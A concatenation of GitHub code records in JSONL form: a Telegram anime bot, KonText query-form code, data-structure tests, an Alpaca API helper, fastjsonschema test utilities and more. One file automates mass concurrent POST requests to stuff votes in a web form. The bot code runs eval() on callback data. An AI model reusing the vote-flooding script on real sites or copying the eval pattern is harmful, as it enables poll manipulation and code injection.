InlineKeyboardMarkup(keyboard)\n update.message.reply_text('What would you like like to do?', reply_markup=reply_markup)\n\n\ndef search(update: Update, context: CallbackContext) -> None:\n try:\n update.message.reply_text('Searching... Please wait...')\n search = AnimeSearch(update.message.text.replace('search', '')).results\n keyboard = []\n print(len(search))\n for x in range(5):\n print(str(Anime(search[x].mal_id).title_english))\n if str(Anime(search[x].mal_id).title_english) == \"None\":\n name = str(Anime(search[x].mal_id).title_japanese)\n id = str(search[x].mal_id)\n y = {\n \"name\": name,\n \"id\": id\n }\n keyboard.append(\n [InlineKeyboardButton(str(name),\n callback_data=json.dumps(y))])\n else:\n name = str(Anime(search[x].mal_id).title_english)\n id = str(search[x].mal_id)\n y = {\n \"name\": name,\n \"id\": id\n }\n keyboard.append(\n [InlineKeyboardButton(str(name),\n callback_data=json.dumps(y))])\n reply_markup = InlineKeyboardMarkup(keyboard)\n update.message.reply_text('Please choose:', reply_markup=reply_markup)\n except ValueError:\n context.bot.send_message(chat_id=update.effective_chat.id, text='No anime found')\n\n\ndef animegenres():\n randos = random.sample(genres, 5)\n keyboard = [\n [InlineKeyboardButton(str(randos[0]), callback_data='genre' + str(randos[0]))],\n [InlineKeyboardButton(str(randos[1]), callback_data='genre' + str(randos[1]))],\n [InlineKeyboardButton(str(randos[2]), callback_data='genre' + str(randos[2]))],\n [InlineKeyboardButton(str(randos[3]), callback_data='genre' + str(randos[3]))],\n [InlineKeyboardButton(\"I don't like these\", callback_data=\"donotlike\")]\n ]\n reply_markup = InlineKeyboardMarkup(keyboard)\n return reply_markup\n\n\ndef handle_info(query, boolean):\n if boolean:\n jdata = json.loads(query.data[:-4])\n # anime = query.data[:-5]\n anime = jdata[\"id\"]\n name = jdata[\"name\"]\n print(jdata)\n\n else:\n print(query.data)\n slicedgenre = query.data[5:].lower()\n # if query.data.find('dislike') == 0:\n # slicedgenre = query.data[7:].lower()\n value = random.choice(list(eval(slicedgenre).values()))\n search = AnimeSearch(value).results\n anime = search[0].mal_id\n name = search[0].title\n website = search[0].url\n # req_body = request.get_json()\n # user = get_user_from_request(req_body)\n # bot.send_message(user.id, str(website))\n\n keyboard = [\n [InlineKeyboardButton('synopsis', callback_data=str(anime) + ' synopsis')],\n [InlineKeyboardButton('rank', callback_data=str(anime) + ' rank')],\n [InlineKeyboardButton('duration', callback_data=str(anime) + ' duration')],\n [InlineKeyboardButton('air date', callback_data=str(anime) + ' air date')],\n [InlineKeyboardButton('status', callback_data=str(anime) + ' status')],\n ]\n\n if not boolean:\n keyboard.append([InlineKeyboardButton('Nope', callback_data='dislike')])\n reply_markup = InlineKeyboardMarkup(keyboard)\n query.edit_message_text(text=name, reply_markup=reply_markup)\n\n # else:\n # anime = AnimeSearch(int(query.data))\n # query.edit_message_text(text=f\"{anime.title} is rated: {anime.score}\")\n # query.edit_message_text(text=f\"Selected option: {query.data}\")\n\n\ndef handle_genre():\n return ''\n\n\ndef synopsis_command(res, query):\n query.edit_message_text(text=Anime(res).title + ' synopsis:\\n' + Anime(res).synopsis + \"\\n \\n\" + Anime(res).url)\n\n\ndef rank_command(res, query):\n query.edit_message_text(text=Anime(res).title + ' rank:\\n' + str(Anime(res).rank) + \"\\n \\n\" + Anime(res).url)\n\n\ndef duration_command(res, query):\n query.edit_message_text(text=Anime(res).title + ' duration:\\n' + Anime(res).duration + \"\\n \\n\" + Anime(res).url)\n\n\ndef air_date_command(res, query):\n query.edit_message_text(text=Anime(res).title + ' air date:\\n' + Anime(res).aired + \"\\n \\n\" + Anime(res).url)\n\n\ndef status_command(res, query):\n query.edit_message_text(text=Anime(res).title + ' status:\\n' + Anime(res).status + \"\\n \\n\" + Anime(res).url)\n\n\ndef image_command(res, query):\n telebot.send_photo(query.id, res.image_url)\n\n\n# def image_command(res, query):\n# bot.send_photo(query.id, res.image_url)\n\n\ngenres = [\"Action\"\n , 'Adventure'\n , 'Comedy'\n , 'Drama'\n , 'SliceofLife'\n , 'Fantasy'\n , 'Horror'\n , 'Psychological'\n , 'Romance'\n , 'SciFi'\n , 'Sports']\n","repo_name":"davidcaiqifan/culture_finder","sub_path":"handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":8901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25470870836","text":"from typing import Any, Dict, List, Tuple\n\nfrom action.argmapping.conc.base import ConcFormArgs\nfrom action.plugin.ctx import PluginCtx\nfrom sanic.request import RequestParameters\n\nfrom .filter import (\n FilterFormArgs, FirstHitsFilterFormArgs, SubHitsFilterFormArgs)\nfrom .other import (\n KwicSwitchArgs, LgroupOpArgs, LockedOpFormsArgs, SampleFormArgs, ShuffleFormArgs)\nfrom .query import QueryFormArgs\nfrom .sort import SortFormArgs\n\n\nasync def build_conc_form_args(plugin_ctx: PluginCtx, corpora: List[str], data: Dict[str, Any], op_key: str) -> ConcFormArgs:\n \"\"\"\n A factory method to create a conc form args\n instance based on deserialized data from\n query_persistence database.\n \"\"\"\n tp = data['form_type']\n if tp == 'query':\n return (await QueryFormArgs.create(plugin_ctx=plugin_ctx, corpora=corpora, persist=False)).updated(data, op_key)\n elif tp == 'filter':\n return (await FilterFormArgs.create(plugin_ctx=plugin_ctx, maincorp=data['maincorp'], persist=False)).updated(data, op_key)\n elif tp == 'sort':\n return SortFormArgs(persist=False).updated(data, op_key)\n elif tp == 'sample':\n return SampleFormArgs(persist=False).updated(data, op_key)\n elif tp == 'shuffle':\n return ShuffleFormArgs(persist=False).updated(data, op_key)\n elif tp == 'switchmc':\n return KwicSwitchArgs(maincorp=data['maincorp'], persist=False).updated(data, op_key)\n elif tp == 'lgroup':\n return LgroupOpArgs(persist=False).updated(data, op_key)\n elif tp == 'locked':\n return LockedOpFormsArgs(persist=False).updated(data, op_key)\n elif tp == 'subhits':\n return SubHitsFilterFormArgs(persist=False).updated(data, op_key)\n elif tp == 'firsthits':\n struct = data['doc_struct'] if 'doc_struct' in data else data['struct'] # doc_struct is a legacy key\n return FirstHitsFilterFormArgs(persist=False, struct=struct).updated(data, op_key)\n else:\n raise ValueError(f'cannot determine stored conc args class from type {tp}')\n\n\nasync def decode_raw_query(\n plugin_ctx: PluginCtx,\n corpora: List[str],\n args: RequestParameters\n) -> List[Tuple[str, ConcFormArgs]]:\n \"\"\"\n Based on raw Manatee query parameters stored in 'args', create respective KonText forms.\n\n Returns pairs (raw_query, query form)\n \"\"\"\n ans = []\n for raw_op in args.getlist('q'):\n op = raw_op[0]\n if op in ('q', 'a'):\n ans.append((\n raw_op,\n (await QueryFormArgs.create(plugin_ctx=plugin_ctx, corpora=corpora, persist=True)\n ).from_raw_query(raw_op, corpora[0])))\n elif op == 'r':\n ans.append((raw_op, SampleFormArgs(persist=True).from_raw_query(raw_op, corpora[0])))\n elif op == 's':\n ans.append((raw_op, SortFormArgs(persist=True).from_raw_query(raw_op, corpora[0])))\n elif op == 'f':\n ans.append((raw_op, ShuffleFormArgs(persist=True).from_raw_query(raw_op, corpora[0])))\n elif op == 'D':\n ans.append((raw_op, SubHitsFilterFormArgs(persist=True).from_raw_query(raw_op, corpora[0])))\n elif op == 'F':\n ans.append(\n (raw_op, FirstHitsFilterFormArgs(persist=True, struct='').from_raw_query(raw_op, corpora[0])))\n elif op in ('n', 'N', 'p', 'P'):\n ans.append((\n raw_op,\n (await FilterFormArgs.create(plugin_ctx=plugin_ctx, maincorp=raw_op, persist=True)\n ).from_raw_query(raw_op, corpora[0])))\n elif op == 'x':\n ans.append((\n raw_op, KwicSwitchArgs(maincorp=raw_op, persist=True).from_raw_query(raw_op, corpora[0])))\n else:\n raise ValueError(f'failed to determine form for the encoded operation \"{op}\"')\n return ans\n","repo_name":"czcorpus/kontext","sub_path":"lib/action/argmapping/conc/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3828,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"31"} +{"seq_id":"17303866751","text":"class NumMatrix(object):\n def __init__(self, matrix):\n \"\"\"\n initialize your data structure here.\n :type matrix: List[List[int]]\n \"\"\"\n if not matrix or not matrix[0]:\n self.matrix_sum = [[]]\n return\n\n n, m = len(matrix), len(matrix[0])\n self.matrix_sum = [[0 for j in range(m)] for i in range(n)]\n\n for i, row in enumerate(matrix):\n for j, num in enumerate(row):\n self.matrix_sum[i][j] = matrix[i][j] + \\\n self.get_sum(i - 1, j) + \\\n self.get_sum(i, j - 1) - \\\n self.get_sum(i - 1, j - 1)\n\n def sumRegion(self, row1, col1, row2, col2):\n \"\"\"\n sum of elements matrix[(row1,col1)..(row2,col2)], inclusive.\n :type row1: int\n :type col1: int\n :type row2: int\n :type col2: int\n :rtype: int\n \"\"\"\n return self.get_sum(row2, col2) -\\\n self.get_sum(row1 - 1, col2) -\\\n self.get_sum(row2, col1 - 1) +\\\n self.get_sum(row1 - 1, col1 - 1)\n\n def get_sum(self, row, col):\n if not self.matrix_sum or not self.matrix_sum[0]:\n return 0\n if row < 0 or col < 0 or row >= len(self.matrix_sum) or col >= len(self.matrix_sum[0]):\n return 0\n return self.matrix_sum[row][col]\n\n# Your NumMatrix object will be instantiated and called as such:\nmatrix = [\n [3, 0, 1, 4, 2],\n [5, 6, 3, 2, 1],\n [1, 2, 0, 1, 5],\n [4, 1, 0, 1, 7],\n [1, 0, 3, 0, 5]\n]\nnumMatrix = NumMatrix(matrix)\nassert(numMatrix.sumRegion(2, 1, 4, 3) == 8)\nassert(numMatrix.sumRegion(1, 1, 2, 2) == 11)\nassert(numMatrix.sumRegion(1, 2, 2, 4) == 12)\nprint(\"tests passed\")\n","repo_name":"dsdshcym/LeetCode-Solutions","sub_path":"algorithms/range_sum_query_2D.py","file_name":"range_sum_query_2D.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"14503681655","text":"import sys\nimport os\nsys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)),\n os.path.pardir))\nimport unittest\nfrom Dicts.DictsOrganizations.BalancedTree import AVLTree\nfrom Dicts.DictsOrganizations.BalancedTree import BalancedTreeNode\nfrom Dicts.TypesDicts.BalancedTreeDict import AVLTreeDict\n\n\nclass TestAVLTreeDict(unittest.TestCase):\n def setUp(self):\n self.test_common_dict = AVLTreeDict([(\"Lenovo\", 70000),\n (\"Toshiba\", 65000),\n (\"Philips\", 50000),\n (\"Vaio\", 90000),\n (\"Samsung\", 80000),\n (\"Dell\", 85000),\n (\"Apple\", 100000), (\"HP\", 70000),\n (\"Acer\", 75000)])\n self.test_little_dict = AVLTreeDict([(\"Lenovo\", 70000),\n (\"Philips\", 50000),\n (\"Vaio\", 90000),\n (\"HP\", 70000), (\"Apple\", 100000)])\n self.test_empty_dict = AVLTreeDict([])\n\n def test_contains(self):\n self.assertEquals(self.test_common_dict.__contains__(\"Dell\"), True)\n self.assertEquals(self.test_little_dict.__contains__(\"Acer\"), False)\n\n def test_clear(self):\n test_clear = AVLTreeDict([(\"Lenovo\", 70000), (\"Philips\", 50000),\n (\"Vaio\", 90000), (\"HP\", 70000),\n (\"Apple\", 100000)])\n test_clear.clear()\n self.assertEquals(len(test_clear), 0)\n self.assertEquals(test_clear.root, None)\n\n def test_fromkeys(self):\n keys = []\n values = []\n sequence = [\"1\", \"2\", \"3\"]\n test_fromkeys_dict = AVLTreeDict([(\"ASUS\", 80000), (\"Toshiba\", 65000),\n (\"Dell\", 90000), (\"Acer\", 75000),\n (\"Apple\", 100000),\n (\"Samsung\", 60000)])\n test_fromkeys_dict.fromkeys(sequence, 1)\n for node in test_fromkeys_dict.nodes_list:\n keys.append(node.key)\n values.append(node.value)\n self.assertEquals(keys, [\"1\", \"2\", \"3\"])\n self.assertEquals(values, [1, 1, 1])\n\n def test_get(self):\n self.assertEquals(self.test_common_dict.get(\"Lenovo\"), 70000)\n self.assertEquals(self.test_little_dict.get(\"MIO\", 45000), 45000)\n\n def test_items(self):\n self.assertEquals(self.test_little_dict.items(), [(\"Lenovo\", 70000),\n (\"Philips\", 50000),\n (\"Vaio\", 90000),\n (\"HP\", 70000),\n (\"Apple\", 100000)])\n self.assertEquals(self.test_empty_dict.items(), [])\n\n def test_keys(self):\n self.assertEquals(self.test_common_dict.keys(), [\"Lenovo\", \"Toshiba\",\n \"Philips\", \"Vaio\",\n \"Samsung\", \"Dell\",\n \"Apple\", \"HP\",\n \"Acer\"])\n self.assertEquals(self.test_empty_dict.keys(), [])\n\n def test_popitem(self):\n test_popitem_dict = AVLTreeDict([(\"ASUS\", 80000), (\"Toshiba\", 65000),\n (\"Dell\", 90000)])\n test_popitem_dict.popitem()\n self.assertEquals(len(test_popitem_dict), 2)\n test_popitem_dict.clear()\n with self.assertRaises(KeyError):\n test_popitem_dict.popitem()\n\n def test_setdefault(self):\n test_setdefault_dict = AVLTreeDict([(\"ASUS\", 80000),\n (\"Toshiba\", 65000),\n (\"Dell\", 90000)])\n self.assertEquals(test_setdefault_dict.setdefault(\"Dell\"), 90000)\n self.assertEquals(len(test_setdefault_dict), 3)\n self.assertEquals(test_setdefault_dict.setdefault(\"MSI\", 45000), 45000)\n self.assertEquals(len(test_setdefault_dict), 4)\n\n def test_pop(self):\n test_pop_dict = AVLTreeDict([(\"ASUS\", 80000), (\"Toshiba\", 65000),\n (\"Dell\", 90000)])\n self.assertEquals(test_pop_dict.pop(\"Toshiba\"), 65000)\n self.assertEquals(test_pop_dict.__contains__(\"Toshiba\"), False)\n self.assertEquals(len(test_pop_dict), 2)\n\n def test_values(self):\n self.assertEquals(self.test_little_dict.values(), [70000, 50000, 90000,\n 70000, 100000])\n self.assertEquals(self.test_empty_dict.values(), [])\n\n def test_update(self):\n test_update_dict = AVLTreeDict([(\"ASUS\", 80000), (\"Toshiba\", 65000),\n (\"Dell\", 90000)])\n test_update_dict.update(self.test_common_dict)\n self.assertEquals(len(test_update_dict), 10)\n self.assertEquals(test_update_dict.__contains__(\"ASUS\"), True)\n for node_key in self.test_common_dict:\n self.assertEquals(test_update_dict.__contains__(node_key), True)\n\n def test_copy(self):\n test_copy_dict = self.test_common_dict.copy()\n self.assertEquals(len(test_copy_dict), 9)\n self.assertEquals(\n test_copy_dict.root.key, self.test_common_dict.root.key)\n self.assertEquals(\n test_copy_dict.root.value, self.test_common_dict.root.value)\n\n def test_eq(self):\n test_eq_dict = AVLTreeDict([(\"Lenovo\", 70000), (\"Philips\", 50000),\n (\"Vaio\", 90000), (\"HP\", 70000),\n (\"Apple\", 100000)])\n self.assertEquals(self.test_little_dict.__eq__(test_eq_dict), True)\n test_eq_dict = AVLTreeDict([(\"ASUS\", 80000), (\"Toshiba\", 65000),\n (\"Dell\", 90000), (\"Acer\", 75000),\n (\"Apple\", 100000)])\n self.assertEquals(self.test_common_dict.__eq__(test_eq_dict), False)\n test_eq_dict = AVLTreeDict([(\"ASUS\", 80001), (\"Toshiba\", 65001),\n (\"Dell\", 90001), (\"Acer\", 75001),\n (\"Apple\", 100001), (\"Samsung\", 60001)])\n self.assertEquals(self.test_common_dict.__eq__(test_eq_dict), False)\n test_eq_dict = AVLTreeDict([(\"Toshiba\", 65000), (\"Samsung\", 60000),\n (\"Dell\", 90000), (\"Apple\", 100000),\n (\"Acer\", 75000), (\"ASUS\", 80000)])\n self.assertEquals(self.test_common_dict.__eq__(test_eq_dict), False)\n\n def test_len(self):\n self.assertEquals(0, self.test_empty_dict.__len__())\n self.assertEquals(9, self.test_common_dict.__len__())\n self.assertEquals(5, self.test_little_dict.__len__())\n\n def test_delitem(self):\n test_delitem_dict = AVLTreeDict([(\"ASUS\", 80000), (\"Toshiba\", 65000),\n (\"Dell\", 90000)])\n del test_delitem_dict[\"Dell\"]\n self.assertEquals(test_delitem_dict.__contains__(\"Dell\"), False)\n self.assertEquals(len(test_delitem_dict), 2)\n\n def test_iter(self):\n keys = []\n for node_key in self.test_little_dict:\n keys.append(node_key)\n self.assertEquals(keys, [\"Lenovo\", \"Philips\", \"Vaio\", \"HP\", \"Apple\"])\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"Ashuxtoff/Dicts","sub_path":"TestsDicts/test_BalancedTreeDict.py","file_name":"test_BalancedTreeDict.py","file_ext":"py","file_size_in_byte":7699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20352172054","text":"import os\nimport shutil\nfrom pathlib import Path\n\nimport hydra\nimport numpy as np\nfrom omegaconf import DictConfig\n\nfrom src import NishikaDataset, calc_metrics, get_logger\nfrom src.data_vis import plot_confusion_matrix\nfrom src.ensemble import Ensemble\n\nCUR_DIR = Path().resolve() # Path to current directory\nTARGET2CLASS = NishikaDataset.target2class\n\n\ndef run(output_dir, cfg, logger):\n ens = Ensemble(output_dir, cfg)\n prob_oof, pred_oof, prob_test, pred_test = ens.averaging()\n\n with open(os.path.join(output_dir, \"prob_oof.npy\"), \"wb\") as f:\n np.save(f, prob_oof)\n with open(os.path.join(output_dir, \"prob_test.npy\"), \"wb\") as f:\n np.save(f, prob_test)\n\n oof = ens.oof\n oof[\"pred\"] = pred_oof\n oof.to_csv(os.path.join(output_dir, \"oof.csv\"), index=False, header=True)\n\n # Create submission\n sub = ens.sub\n sub[\"class\"] = pred_test\n sub[\"class\"] = sub[\"class\"].map(lambda x: TARGET2CLASS[x])\n sub.to_csv(os.path.join(output_dir, \"submission.csv\"), index=False)\n\n # Plot confusion matrix\n y_valid = oof.target.values.flatten()\n plot_confusion_matrix(\n trues=[y_valid],\n preds=[pred_oof],\n phases=[\"oof\"],\n labels=NishikaDataset.labels,\n path=os.path.join(output_dir, \"confusion_matrix.png\"),\n )\n plot_confusion_matrix(\n trues=[y_valid],\n preds=[pred_oof],\n phases=[\"oof\"],\n labels=NishikaDataset.labels,\n path=os.path.join(output_dir, \"normalize_confusion_matrix.png\"),\n normalize=\"true\",\n )\n\n # Log metrics\n metrics = [\"loss\", \"accuracy\", \"f1\"]\n\n oof_logs = calc_metrics(y_true=y_valid, y_pred=pred_oof, y_prob=prob_oof, metrics=metrics)\n for metric in metrics:\n logger.debug(f\"{metric}: {oof_logs[metric]:.06f}\")\n\n\n@hydra.main(config_path=\"configs\", config_name=\"config\")\ndef main(cfg: DictConfig) -> None:\n logger, log_dir = get_logger(\n fn_args=[cfg.exp.name],\n dir=os.path.join(CUR_DIR, \"logs/\"),\n )\n\n # move hydra logs to logging directory and reset working directory\n shutil.move(os.path.join(os.getcwd(), \".hydra\"), log_dir)\n os.remove(os.path.join(os.getcwd(), os.path.basename(__file__).replace(\".py\", \".log\")))\n os.rmdir(os.getcwd())\n os.chdir(hydra.utils.get_original_cwd())\n\n run(output_dir=log_dir, cfg=cfg.exp, logger=logger)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"takumiw/nishika-cable-classification-1st-place","sub_path":"run_averaging.py","file_name":"run_averaging.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33397628338","text":"\"\"\"This modules contains functions to handle asynchronous\nhttp requests\"\"\"\nimport asyncio\nimport aiohttp\n\npayload = {'id': '2829', 'holdthedoor': 'Enviar'}\n\nasync def makepost_req(url, session):\n async with session.post(url, data=payload) as res:\n if len(await res.text()) > 100:\n return 1\n return 0\n\n\ndef get_tasks(url, session, total_req=1):\n \"\"\"Forms an array of tasks\"\"\"\n tasks = []\n for _ in range(total_req):\n tasks.append(asyncio.create_task(makepost_req(url, session)))\n return tasks\n\n\nasync def send_requests(url, total_req=1):\n \"\"\"Keeps track of all requests\"\"\"\n async with aiohttp.ClientSession() as session:\n tasks = get_tasks(url, session, total_req)\n return await asyncio.gather(*tasks)\n\n\nasync def make_async_requests(url, total_req=1):\n \"\"\"Makes sure that 'total_req' reuqests were successfull\"\"\"\n success, sended_req = 0, 0\n while success < total_req:\n remaining_requests = total_req - success\n responses = await send_requests(url, remaining_requests)\n for succs in responses:\n success += succs\n sended_req += remaining_requests\n \n print('Success rate: {}% ({}/{})'.format(success * 100/ sended_req, success, sended_req))\n\n\ndef start_requests(url, total_req=1):\n \"\"\"Starts the requests sending process\"\"\"\n asyncio.run(make_async_requests(url, total_req))\n","repo_name":"rennleon/hodor","sub_path":"level_0/async_requests.py","file_name":"async_requests.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10516127878","text":"\"\"\"Apca params class.\"\"\"\n# %% codecell\nfrom collections import defaultdict\nfrom datetime import timedelta\n\nimport requests\nimport pandas as pd\n\ntry:\n from scripts.dev.data_collect.alpaca.news.historical import ApcaNewsHistorical\n from scripts.dev.data_collect.alpaca.methods.announcements import ApcaAnnouncements\n from scripts.dev.data_collect.alpaca.methods.calendar import ApcaCalendar\n from scripts.dev.multiuse.help_class import getDate\nexcept ModuleNotFoundError:\n from data_collect.alpaca.news.historical import ApcaNewsHistorical\n from data_collect.alpaca.methods.announcements import ApcaAnnouncements\n from data_collect.alpaca.methods.calendar import ApcaCalendar\n from multiuse.help_class import getDate\n\n# %% codecell\n\n\nclass ApcaParams():\n \"\"\"Alpaca Parameters for API Calls.\"\"\"\n\n burl_api = 'https://api.alpaca.markets/v2'\n burl_data = 'https://data.alpaca.markets/v2'\n\n def __init__(self, **kwargs):\n self._api_endpoints(self, **kwargs)\n self._apca_request_type(self, **kwargs)\n self._apca_api_params(self, **kwargs)\n self._apca_clean_write_functions(self, **kwargs)\n\n @classmethod\n def _api_endpoints(cls, self, **kwargs):\n \"\"\"Construct dict of url_endpoints.\"\"\"\n\n apca_endpoints = ({\n 'news_historical': 'https://data.alpaca.markets/v1beta1/news',\n 'announcements': f'{self.burl_api}/corporate_actions/announcements',\n 'calendar': f\"{self.burl_api}/calendar\",\n 'historical_trades': f\"{self.burl_data}/stocks/trades\",\n })\n\n self.apca_endpoints = apca_endpoints\n\n @classmethod\n def _apca_request_type(cls, self, **kwargs):\n \"\"\"Request dict for different types.\"\"\"\n # Add methods as needed\n apca_request_type = ({})\n\n def default_val():\n return requests.get\n # Create default dictionary with requests.get as default value\n req_dict = defaultdict(default_val, apca_request_type)\n self.req_dict = req_dict\n self.req_keys = list(req_dict.keys())\n\n @classmethod\n def _apca_api_params(cls, self, **kwargs):\n \"\"\"Add default parameters for dictionary.\"\"\"\n until = pd.Timestamp.now().date()\n since = until - timedelta(days=89)\n\n offset = 30 * 24 * 3600\n hist_start = getDate.tz_aware_dt_now(rfcc=True, offset=offset)\n\n apca_params = ({\n 'news_historical': ({'limit': 50, 'include_content': True}),\n 'announcements': ({'since': since, 'until': until}),\n 'historical_trades': ({'symbols': ['AAPL', 'TSLA', 'SPY', 'GOOGL'],\n 'start': hist_start,\n 'limit': 10000})\n\n })\n\n self.apca_params = apca_params\n\n @classmethod\n def _apca_clean_write_functions(cls, self, **kwargs):\n \"\"\"Dictionary of commonly used cleaning functions.\"\"\"\n # Add methods as needed\n apca_clean_dict = ({\n 'news_historical': ApcaNewsHistorical,\n 'announcements': ApcaAnnouncements,\n 'calendar': ApcaCalendar\n })\n\n def default_func():\n return None\n\n apca_c_default_dict = defaultdict(default_func, apca_clean_dict)\n # List comprehension for default methods\n # [td_clean_dict.setdefault(key, TdmaDefault) for key in self.klist]\n\n self.apca_clean_dict = apca_c_default_dict\n","repo_name":"webclinic017/algotrading-20","sub_path":"data_collect/alpaca/api_calls/apca_params.py","file_name":"apca_params.py","file_ext":"py","file_size_in_byte":3434,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"42064647112","text":"import json\nfrom pathlib import Path\n\nimport pytest\nfrom urllib.request import urlopen\n\nfrom fastjsonschema import RefResolver, JsonSchemaValueException, compile, _get_code_generator_class\n\n\nREMOTES = {\n 'http://localhost:1234/integer.json': {'type': 'integer'},\n 'http://localhost:1234/name.json': {\n 'type': 'string',\n 'definitions': {\n 'orNull': {'anyOf': [{'type': 'null'}, {'$ref': '#'}]},\n },\n },\n 'http://localhost:1234/subSchemas.json': {\n 'integer': {'type': 'integer'},\n 'refToInteger': {'$ref': '#/integer'},\n },\n 'http://localhost:1234/folder/folderInteger.json': {'type': 'integer'}\n}\n\n\ndef remotes_handler(uri):\n if uri in REMOTES:\n return REMOTES[uri]\n req = urlopen(uri)\n encoding = req.info().get_content_charset() or 'utf-8'\n return json.loads(req.read().decode(encoding),)\n\n\ndef resolve_param_values_and_ids(schema_version, suite_dir, ignored_suite_files=[], ignore_tests=[]):\n suite_dir_path = Path(suite_dir).resolve()\n test_file_paths = sorted(set(suite_dir_path.glob(\"**/*.json\")))\n\n param_values = []\n param_ids = []\n for test_file_path in test_file_paths:\n with test_file_path.open(encoding='UTF-8') as test_file:\n test_cases = json.load(test_file)\n for test_case in test_cases:\n for test_data in test_case['tests']:\n param_values.append(pytest.param(\n schema_version,\n test_case['schema'],\n test_data['data'],\n test_data['valid'],\n marks=pytest.mark.xfail\n if test_file_path.name in ignored_suite_files\n or test_case['description'] in ignore_tests\n else pytest.mark.none,\n ))\n param_ids.append('{} / {} / {}'.format(\n test_file_path.name,\n test_case['description'],\n test_data['description'],\n ))\n return param_values, param_ids\n\n\ndef template_test(schema_version, schema, data, is_valid):\n \"\"\"\n Test function to be used (imported) in final test file to run the tests\n which are generated by `pytest_generate_tests` hook.\n \"\"\"\n # For debug purposes. When test fails, it will print stdout.\n resolver = RefResolver.from_schema(schema, handlers={'http': remotes_handler})\n\n debug_generator = _get_code_generator_class(schema_version)(schema, resolver=resolver)\n print(debug_generator.global_state_code)\n print(debug_generator.func_code)\n\n # JSON schema test suits do not contain schema version.\n # Our library needs to know that or it would use always the latest implementation.\n if isinstance(schema, dict):\n schema.setdefault('$schema', schema_version)\n\n validate = compile(schema, handlers={'http': remotes_handler})\n try:\n result = validate(data)\n print('Validate result:', result)\n except JsonSchemaValueException:\n if is_valid:\n raise\n else:\n if not is_valid:\n pytest.fail('Test should not pass')\n","repo_name":"horejsek/python-fastjsonschema","sub_path":"tests/json_schema/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","stars":413,"dataset":"github-code","pt":"31"} +{"seq_id":"6670213355","text":"\"\"\"backend URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, re_path\nfrom toshi import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n re_path(r'^api/toshi/assets/$', views.assetRequest),\n re_path(r'^api/toshi/walletBalance/$', views.walletBalanceRequest),\n re_path(r'^api/toshi/graph/$', views.graphRequest),\n re_path(r'^api/toshi/accountGraph/$', views.accountGraphRequest),\n re_path(r'^api/toshi/account/$', views.account),\n re_path(r'^api/toshi/accounthistory/$', views.accounthistory),\n re_path(r'^api/toshi/$', views.httpRequest),\n re_path(r'^api/toshi/volume_history_overview', views.volume_history_overview),\n re_path(r'^api/toshi/history', views.history),\n]\n","repo_name":"adamseid/Toshi-Backend","sub_path":"backend/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37136593918","text":"import torch\nimport torch.nn as nn\nimport torch.nn.init as init\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport math\nimport sys\nimport numpy as np\n\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"\"\"3x3 convolution with padding\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n\n\ndef conv1x1(in_planes, out_planes, stride=1):\n \"\"\"1x1 convolution\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=True)\n\n\ndef conv_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n init.xavier_uniform(m.weight, gain=np.sqrt(2))\n init.constant(m.bias, 0)\n elif classname.find('BatchNorm') != -1:\n init.constant(m.weight, 1)\n init.constant(m.bias, 0)\n\n\nclass wide_basic(nn.Module):\n def __init__(self, in_planes, planes, dropout_rate, stride=1):\n super(wide_basic, self).__init__()\n\n self.bn1 = nn.BatchNorm2d(in_planes, affine=True)\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=3, padding=1, bias=False)\n self.dropout = nn.Dropout(p=dropout_rate)\n\n self.bn2 = nn.BatchNorm2d(planes, affine=True)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, planes, kernel_size=1, stride=stride, bias=False),\n )\n\n def forward(self, x):\n out = self.dropout(self.conv1(F.relu(self.bn1(x))))\n out = self.conv2(F.relu(self.bn2(out)))\n out += self.shortcut(x)\n\n return out\n\n\nclass Wide_ResNet(nn.Module):\n def __init__(self, depth, widen_factor, num_classes, dropout_rate=.1):\n super(Wide_ResNet, self).__init__()\n self.in_planes = 16\n\n assert ((depth - 4) % 6 == 0), 'Wide-resnet depth should be 6n+4'\n n = (depth - 4) / 6\n k = widen_factor\n\n print('| Wide-Resnet 